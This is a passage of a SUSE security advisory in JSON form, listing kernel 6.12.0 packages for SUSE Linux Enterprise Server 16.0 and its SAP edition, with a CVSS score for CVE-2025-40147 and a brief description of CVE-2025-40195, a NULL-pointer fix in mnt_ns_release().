"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-40147"
},
{
"cve": "CVE-2025-40195",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40195"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmount: handle NULL values in mnt_ns_release()\n\nWhen calling in listmount() mnt_ns_release() may be passed a NULL\npointer. Handle that case gracefully.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
